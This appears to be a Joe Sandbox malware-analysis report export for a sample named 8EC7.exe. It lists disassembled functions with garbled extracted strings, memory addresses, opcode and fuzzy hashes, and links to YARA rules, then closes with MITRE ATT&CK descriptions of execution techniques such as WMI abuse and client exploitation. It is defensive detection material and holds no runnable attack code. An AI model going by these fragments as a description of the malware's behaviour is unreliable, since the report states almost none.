,wJ[, xrefs: 00007FF641674058
-wJ[, xrefs: 00007FF6416742EC

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: ,wJ[$-wJ[$-wJ[$Qz%a$Qz%a$S; 9$S; 9$|O
API String ID: 0-1154477612
Opcode ID: fe857138256265a509485d277373485d5227e5001fa8a0a2808a081bcbb9ba69
Instruction ID: fd61d387b3d5eff21e6f769d858c8fe6b5189f891bb054ef5ec56d08993d20bc
Opcode Fuzzy Hash: fe857138256265a509485d277373485d5227e5001fa8a0a2808a081bcbb9ba69
Instruction Fuzzy Hash: 7C020D6390C143C6EB36792C914453EF9A297C03A4F265133EAA5977D8DF3CEC456E42

Function 00007FF641605910 Relevance: 10.4, Strings: 8, Instructions: 355COMMON

Download Yara Rule

Strings

s^yY, xrefs: 00007FF6416059ED
t^yY, xrefs: 00007FF641605D63
&(m, xrefs: 00007FF641605E65
&(m, xrefs: 00007FF641605D56
A6M, xrefs: 00007FF641605C88
A6M, xrefs: 00007FF641605A07
A6M, xrefs: 00007FF641605CCC
t^yY, xrefs: 00007FF64160597E

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: &(m$&(m$A6M$A6M$A6M$s^yY$t^yY$t^yY
API String ID: 0-425518891
Opcode ID: f9433a43340ef83df0adc0c2ea3ce5815cb0aae5f7e4af9d6a4aa5c0eee62a57
Instruction ID: 0dae772c9842d6a8652dbff3becbcd835692ecd818e3dc1a691ef0410ddda8c6
Opcode Fuzzy Hash: f9433a43340ef83df0adc0c2ea3ce5815cb0aae5f7e4af9d6a4aa5c0eee62a57
Instruction Fuzzy Hash: 1FC1AB2792C48106A72FEE25955423E7982B387BB0F84622AEE5F937D0CE7CDE005681

Function 00007FF641600050 Relevance: 9.7, Strings: 7, Instructions: 941COMMON

Download Yara Rule

Strings

zZ-, xrefs: 00007FF64160052C
(W,, xrefs: 00007FF641600152
(W,, xrefs: 00007FF641600BE6
Wq.F, xrefs: 00007FF64160025C
zZ-, xrefs: 00007FF641600971
(W,, xrefs: 00007FF641600BE1
Wq.F, xrefs: 00007FF641600D8C

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: (W,$(W,$(W,$Wq.F$Wq.F$zZ-$zZ-
API String ID: 0-1973832573
Opcode ID: 4fa37ac8f7acd6c0d8555323812b9fc3c6616a655d0f7508d89b2a075c38990e
Instruction ID: 5f9b375273309c1c52a65824b51ecc9c3a91ab8ee120292921fa811d2a2d9d86
Opcode Fuzzy Hash: 4fa37ac8f7acd6c0d8555323812b9fc3c6616a655d0f7508d89b2a075c38990e
Instruction Fuzzy Hash: 3082DC35A1C68686EB75FA15A49037E6B90EB877D4F304132E9DEC7BD4CE2DD840AB01

Function 00007FF641621880 Relevance: 9.6, Strings: 7, Instructions: 881COMMON

Download Yara Rule

Strings

[t!:, xrefs: 00007FF641622373
[t!:, xrefs: 00007FF641622927
[t!:, xrefs: 00007FF64162202B
uLh, xrefs: 00007FF641622444
uLh, xrefs: 00007FF641621F4B
uLh, xrefs: 00007FF641621987
[t!:, xrefs: 00007FF64162236C

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: uLh$ uLh$ uLh$[t!:$[t!:$[t!:$[t!:
API String ID: 0-874898717
Opcode ID: 5e0a50c2ee5c35c28fccc85bbf1bb913c022d5b21abb8f6da954ffe1541928b0
Instruction ID: a0622b1379820ff3007ff549fcd3e44f5640a8f37618210dbdd1b515969f3573
Opcode Fuzzy Hash: 5e0a50c2ee5c35c28fccc85bbf1bb913c022d5b21abb8f6da954ffe1541928b0
Instruction Fuzzy Hash: 51821736F0C68286EF75BB59A4903FE6390AB84391F244536EA9DD7798CF2CD444AF01

Function 00007FF641639550 Relevance: 9.4, Strings: 7, Instructions: 652COMMON

Download Yara Rule

Strings

R>t0, xrefs: 00007FF641639972
A)an, xrefs: 00007FF6416397D2
R>t0, xrefs: 00007FF641639C0F
B)an, xrefs: 00007FF641639C3F
B)an, xrefs: 00007FF641639EA3
h @m, xrefs: 00007FF641639CBE
h @m, xrefs: 00007FF6416397EC

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: A)an$B)an$B)an$R>t0$R>t0$h @m$h @m
API String ID: 0-2014293124
Opcode ID: a952c9efa5565efe295c4d81218c6562816acb387cb051f672b544dc10768fb4
Instruction ID: 07a5c3b4f64264a1fa5a69ebde08682c88d8f27adcc99dd58aa0986fba0a0171
Opcode Fuzzy Hash: a952c9efa5565efe295c4d81218c6562816acb387cb051f672b544dc10768fb4
Instruction Fuzzy Hash: 3652A46790C15585FB26BE25900033A6EA0E754B54F158032DE5BB3FD8DE7DE883AF81

Function 00007FF641605ED0 Relevance: 8.1, Strings: 6, Instructions: 617COMMON

Download Yara Rule

Strings

m~MK, xrefs: 00007FF64160643E
Tv, xrefs: 00007FF641606306
Tv, xrefs: 00007FF64160634C
9fO, xrefs: 00007FF6416069C9
Tv, xrefs: 00007FF641606283
m~MK, xrefs: 00007FF641606224

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: 9fO$m~MK$m~MK$Tv$Tv$Tv
API String ID: 0-219908125
Opcode ID: 00c47b21b9d8a3baaef8510b81e142f883ad99dbf64240025ea6ed929df38376
Instruction ID: 38d154de8f235897c6b0aac5f3ef98ea8966cc68d5381d5b625a9b4e26ec4017
Opcode Fuzzy Hash: 00c47b21b9d8a3baaef8510b81e142f883ad99dbf64240025ea6ed929df38376
Instruction Fuzzy Hash: 51423965A1C14247EB7EF62854A413D6ED2AF87314F64453EE64FC7AE8CD2CE880AF05

Function 00007FF641651700 Relevance: 8.0, Strings: 6, Instructions: 452COMMON

Download Yara Rule

Strings

M", xrefs: 00007FF641651DC1
fN', xrefs: 00007FF641651E17
eN', xrefs: 00007FF641651900
fN', xrefs: 00007FF641651CC7
M", xrefs: 00007FF641651B9C
M", xrefs: 00007FF641651884

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: M"$M"$M"$eN'$fN'$fN'
API String ID: 0-299084768
Opcode ID: 17f3616fc0963ea9cf3f3ee8fb239ba1953bc571f74850901a194704eb31bcbc
Instruction ID: 763835c315ee6983d9f33ff6b1ee14ef499977f52f3eb8674128d331d1e8489e
Opcode Fuzzy Hash: 17f3616fc0963ea9cf3f3ee8fb239ba1953bc571f74850901a194704eb31bcbc
Instruction Fuzzy Hash: E712ED35A0C64287EB797718B09437E6A91DF91358F204139E65E87BD6CF3CE944AF01

Function 00007FF64166C230 Relevance: 7.7, Strings: 5, Instructions: 1434COMMON

Download Yara Rule

Strings

DV, xrefs: 00007FF64166C3C0
C:\Users\user\AppData\Local\Temp\8EC7.exe, xrefs: 00007FF64166C2DB
jsx6, xrefs: 00007FF64166C6DB
ksx6, xrefs: 00007FF64166D0AE
ksx6, xrefs: 00007FF64166CABF

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: DV$C:\Users\user\AppData\Local\Temp\8EC7.exe$jsx6$ksx6$ksx6
API String ID: 0-2646949171
Opcode ID: 1d23c07042c6ce4f6880151f9bc50497c94753d57e86f9ce995a9aa16bbd1d7d
Instruction ID: 1e73812218c64404709a86eb2ae4ea5413cd11c1b3b0b087df93e9d938522e4a
Opcode Fuzzy Hash: 1d23c07042c6ce4f6880151f9bc50497c94753d57e86f9ce995a9aa16bbd1d7d
Instruction Fuzzy Hash: 82E2082690CAC98DDB7A6F3588642FC37A0EB45349F14113ADA9ECEFD5CE18DB41A701

Function 00007FF64166F5B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 202COMMON

Download Yara Rule

Strings

X,n, xrefs: 00007FF64166F6A0
Y,n, xrefs: 00007FF64166F7A0
Y,n, xrefs: 00007FF64166F7CA

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: X,n$Y,n$Y,n
API String ID: 0-3478138459
Opcode ID: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
Instruction ID: 2195f7a4161c3b2da8698037937974ed7d997879abfbab899f4398f8e48767f0
Opcode Fuzzy Hash: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
Instruction Fuzzy Hash: 0991C232F19B5988FB11AFBAD8412EC63B0BB48798F145626DE4CE3764DF38D5929700

Function 00007FF641633150 Relevance: 7.2, Strings: 5, Instructions: 940COMMON

Download Yara Rule

Strings

vc[, xrefs: 00007FF641633816
vc[, xrefs: 00007FF6416338F2
5n!, xrefs: 00007FF6416331C7
uc[, xrefs: 00007FF641633386
5n!, xrefs: 00007FF6416333A7

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: 5n!$5n!$uc[$vc[$vc[
API String ID: 0-468549941
Opcode ID: d689dfdf6a0b0cb9c1b3688676b1d608ce7ada2b7317cd4df454248670db6ae6
Instruction ID: cb1f1139b3cee455e6178c21cd2510e530ba172aad70bd68bcaa0b05c74f30b6
Opcode Fuzzy Hash: d689dfdf6a0b0cb9c1b3688676b1d608ce7ada2b7317cd4df454248670db6ae6
Instruction Fuzzy Hash: 78821F36A0C68A86EB75BB1DE58067EB3D1EB85750F208536D54DC7F94CE2CE482EB01

Function 00007FF64164E430 Relevance: 7.1, Strings: 5, Instructions: 809COMMON

Download Yara Rule

Strings

;A?h, xrefs: 00007FF64164F0D8
5nki, xrefs: 00007FF64164E9B6
:A?h, xrefs: 00007FF64164E6DC
;A?h, xrefs: 00007FF64164EB63
5nki, xrefs: 00007FF64164EB6E

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: 5nki$5nki$:A?h$;A?h$;A?h
API String ID: 0-3808611175
Opcode ID: 17a1e6e6661ad7bc9c360cf986403d14216c4d987dcc975ae746ad0f804ab0f5
Instruction ID: 522c348c1ef345d18054f0b0917de13a6a4753aa83b2173e5fe8996cdaf46a2b
Opcode Fuzzy Hash: 17a1e6e6661ad7bc9c360cf986403d14216c4d987dcc975ae746ad0f804ab0f5
Instruction Fuzzy Hash: 9D727C36B0C68182EB79BB19A56077EA791FBC4740F204936EA8DC7B94FE3CD4409B45

Function 00007FF6415F5AD4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

]t{, xrefs: 00007FF6415F60AD
]t{, xrefs: 00007FF6415F608B

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: ]t{$]t{
API String ID: 0-2389501032
Opcode ID: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
Instruction ID: dea5e9d75c7f89ea7a7bf0e8d2441d8cec9b2404cedb394703600a304811cada
Opcode Fuzzy Hash: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
Instruction Fuzzy Hash: 36B1F3A1D2C34246FB7E722450E42BD1AD36F85301E60013EF5BFC6AF6CDDDA968560A

Function 00007FF641676B70 Relevance: 5.5, Strings: 4, Instructions: 512COMMON

Download Yara Rule

Strings

wtx^, xrefs: 00007FF641676EF1
wnZ:, xrefs: 00007FF641676F50
wtx^, xrefs: 00007FF641676C16
wnZ:, xrefs: 00007FF64167708A

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: wnZ:$wnZ:$wtx^$wtx^
API String ID: 0-3875597248
Opcode ID: d42e7927fa4a0fe237480d81f572ed3daddb1ee9c9cde7802877bc667d80464b
Instruction ID: 693411602eab73135365931ae99add0e78354ea6df9da169f43ce9b891ce889c
Opcode Fuzzy Hash: d42e7927fa4a0fe237480d81f572ed3daddb1ee9c9cde7802877bc667d80464b
Instruction Fuzzy Hash: 8B224C6290CE8A85FB36FA15E40473BAE55BB51B9CF208133DDAA47BD8CF6CD4506B01

Function 00007FF64165898B Relevance: 4.4, Strings: 3, Instructions: 688COMMON

Download Yara Rule

Strings

*FN, xrefs: 00007FF641659351
[[\, xrefs: 00007FF641658CF8
W}:!, xrefs: 00007FF64165B520

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: *FN$W}:!$[[\
API String ID: 0-977268304
Opcode ID: 118ec3e17abe85086266d520440cbc38ebe286edce6aa2a945ce8fe094973cb1
Instruction ID: a3dba518ce4444828b54d706c12adcdbd529d4775f99b342e8f1bac87f402c67
Opcode Fuzzy Hash: 118ec3e17abe85086266d520440cbc38ebe286edce6aa2a945ce8fe094973cb1
Instruction Fuzzy Hash: 3862B926A0C6C5C9EB756F3DA8803FD33A4EB54758F104932DA4DCBB95DF29D680A342

Function 00007FF6415FFB70 Relevance: 2.8, Strings: 2, Instructions: 275COMMON

Download Yara Rule

Strings

W!, xrefs: 00007FF6415FFC06
W!, xrefs: 00007FF6415FFBA7

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: W!$W!
API String ID: 0-695975270
Opcode ID: 4d0958b0a765513eb7a7ebe740961f25a1d9790526d60d0cea0c1aa12fafe601
Instruction ID: 4eda8750c0b482dc44cf7dc5aa1495477692f4186226e340cd56e7a0d3747e08
Opcode Fuzzy Hash: 4d0958b0a765513eb7a7ebe740961f25a1d9790526d60d0cea0c1aa12fafe601
Instruction Fuzzy Hash: B6B10BA7A1C24147EB69B724A4902BE77D2AB85750F244133FFB9C2FA4CE2CDC458A41

Function 00007FF641654370 Relevance: .6, Instructions: 618COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f83be34c14db09b2e2451f9aaf754056a33dfea72b4446c3084df2289fb2a14b
Instruction ID: 586b4aad6a8aac851d86462aad99d539b938043550f3a00c268a476d6b6e06d0
Opcode Fuzzy Hash: f83be34c14db09b2e2451f9aaf754056a33dfea72b4446c3084df2289fb2a14b
Instruction Fuzzy Hash: 2B421B32A0D79286DB75B719F48037E67D0EB84755F104572EE8EC7B99EE2CE440AB01

Function 00007FF641647D60 Relevance: .6, Instructions: 583COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c914f04f0c72d6f6f234bdaf2faaf0dc496f32b016d4c8decd1dc890f50565f
Instruction ID: d6c0fe75da109fe0107752e88b8cc12737ef8c5c66c82c2e9f3114f4be86b68d
Opcode Fuzzy Hash: 6c914f04f0c72d6f6f234bdaf2faaf0dc496f32b016d4c8decd1dc890f50565f
Instruction Fuzzy Hash: A6322131B1D7418AEB79B718A4B027E6296EF94750F200639E99EC7FE4CE2CDC40A745

Function 00007FF641642080 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88782fa51e5a35d4abb1e03b7332a22d9764ab5c9b47563f957e86d09eac9e62
Instruction ID: 51a6e9254bdf3751cd89cff903770ce54f37171a7424bbd9afa8652e81b32930
Opcode Fuzzy Hash: 88782fa51e5a35d4abb1e03b7332a22d9764ab5c9b47563f957e86d09eac9e62
Instruction Fuzzy Hash: 46C1C722A0D64186EB75BA19F0A073E67E3E784B54F30443AEA4DC37ADCE6CD440E709

Function 00007FF641652D70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FF641652E0D

Strings

PG<;, xrefs: 00007FF641652E2B
PG<;, xrefs: 00007FF641652DE7
FA2, xrefs: 00007FF641652DE0
FA2, xrefs: 00007FF641652D85

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID: FileRead
String ID: FA2$FA2$PG<;$PG<;
API String ID: 2738559852-1104478874
Opcode ID: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
Instruction ID: 1bd5d0f05595fe438f8d6c877886cbe63ae694352d296f4928b56ba6eddc6a3d
Opcode Fuzzy Hash: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
Instruction Fuzzy Hash: 4E216513A0C286C1EB723A15B80437A3B60AB45768F144737EE5DCA7DACE3CD841BB40

Function 00007FF641617E40 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 277COMMON

Download Yara Rule

Strings

aCo2, xrefs: 00007FF6416182A5
/~, xrefs: 00007FF641618124
/~, xrefs: 00007FF641617E6B
aCo2, xrefs: 00007FF6416180DC

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: aCo2$aCo2$/~$/~
API String ID: 0-3304968679
Opcode ID: 22d7c74f97c3fa7b79090f9a1661b0688eada34713547cfb80454c75f8ba8637
Instruction ID: 2808a6576e6c038dec07c3d46f245d9e6e13cb398c2fe7ec1120b3c2ab09f4d8
Opcode Fuzzy Hash: 22d7c74f97c3fa7b79090f9a1661b0688eada34713547cfb80454c75f8ba8637
Instruction Fuzzy Hash: 10B1E872A0D24687FB76B758949033E6ED1AB84744F204436EA4EC7794CE3DEC41BB82

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

